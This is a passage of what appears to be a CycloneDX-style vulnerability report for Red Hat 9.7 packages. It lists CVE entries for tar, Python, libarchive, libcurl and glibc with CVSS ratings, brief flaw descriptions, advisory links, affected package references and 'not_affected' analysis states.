"cwes": [ 434 ], "description": "A flaw was found in tar. A remote attacker could exploit this vulnerability by crafting a malicious archive, leading to hidden file injection with fully attacker-controlled content. This bypasses pre-extraction inspection mechanisms, potentially allowing an attacker to introduce malicious files onto a system without detection.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-5704" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/11/10" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/11/11" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/12/2" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-5704" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455360" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5704" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-5704" } ], "published": "2026-04-06T16:16:42+00:00", "updated": "2026-04-22T20:08:59+00:00", "affects": [ { "ref": "pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2", "versions": [ { "version": "2:1.34-9.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-5713", "ratings": [ { "source": { "name": "redhat" }, "score": 6, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N" } ], "cwes": [ 121, 125 ], "description": "The \"profiling.sampling\" module (Python 3.15+) and \"asyncio introspection capabilities\" (3.14+, \"python -m asyncio ps\" and \"python -m asyncio pstree\") features could be used to read and write addresses in a privileged process if that process connected to a malicious or \"infected\" Python process via the remote debugging feature. This vulnerability requires persistently and repeatedly connecting to the process to be exploited, even after the connecting process crashes with high likelihood due to ASLR.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-5713" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/15/6" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-5713" }, { "url": "https://github.com/python/cpython/commit/289fd2c97a7e5aecb8b69f94f5e838ccfeee7e67" }, { "url": "https://github.com/python/cpython/issues/148178" }, { "url": "https://github.com/python/cpython/pull/148187" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/OG4RHARYSNIE22GGOMVMCRH76L5HKPLM/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5713" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-5713" } ], "published": "2026-04-14T16:16:48+00:00", "updated": "2026-04-17T15:11:35+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-5745", "ratings": [ { "source": { "name": "redhat" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 476 ], "description": "A flaw was found in libarchive. A NULL pointer dereference vulnerability exists in the ACL parsing logic, specifically within the archive_acl_from_text_nl() function. When processing a malformed ACL string (such as a bare \"d\" or \"default\" tag without subsequent fields), the function fails to perform adequate validation before advancing the pointer. An attacker can exploit this by providing a maliciously crafted archive, causing an application utilizing the libarchive API (such as bsdtar) to crash, resulting in a Denial of Service (DoS).", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-5745" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8944" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-5745" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455921" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5745" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-5745" } ], "published": "2026-04-07T16:16:32+00:00", "updated": "2026-05-03T15:15:58+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.5.3-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-5773", "ratings": [ { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "description": "A flaw was found in libcurl. Due to a logical error in the connection reuse mechanism for SMB (Server Message Block) transfers, libcurl might reuse an existing SMB connection with a different share than intended. This vulnerability, categorized as CWE-488 (Exposure of Data Element to Wrong Session), could lead to the download of an incorrect file or the upload of a file to an unintended location when an application uses libcurl for SMB transfers.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-5773" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-5773" }, { "url": "https://curl.se/docs/CVE-2026-5773.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5773" }, { "url": "https://ubuntu.com/security/notices/USN-8227-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-5773" } ], "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-5928", "ratings": [ { "source": { "name": "redhat" }, "score": 5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:H" } ], "cwes": [ 127 ], "description": "Calling the ungetwc function on a FILE stream with wide characters encoded in a character set that has overlaps between its single byte and multi-byte character encodings, in the GNU C Library version 2.43 or earlier, may result in an attempt to read bytes before an allocated buffer, potentially resulting in unintentional disclosure of neighboring data in the heap, or a program crash.\n\nA bug in the wide character pushback implementation (_IO_wdefault_pbackfail in libio/wgenops.c) causes ungetwc() to operate on the regular character buffer (fp->_IO_read_ptr) instead of the actual wide-stream read pointer (fp->_wide_data->_IO_read_ptr). The program crash may happen in cases where fp->_IO_read_ptr is not initialized and hence points to NULL. The buffer under-read requires a special situation where the input character encoding is such that there are overlaps between single byte representations and multibyte representations in that encoding, resulting in spurious matches. The spurious match case is not possible in the standard Unicode character sets.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-5928" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-5928" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5928" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33998" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-5928" } ], "published": "2026-04-20T21:16:36+00:00", "updated": "2026-04-23T15:33:43+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": 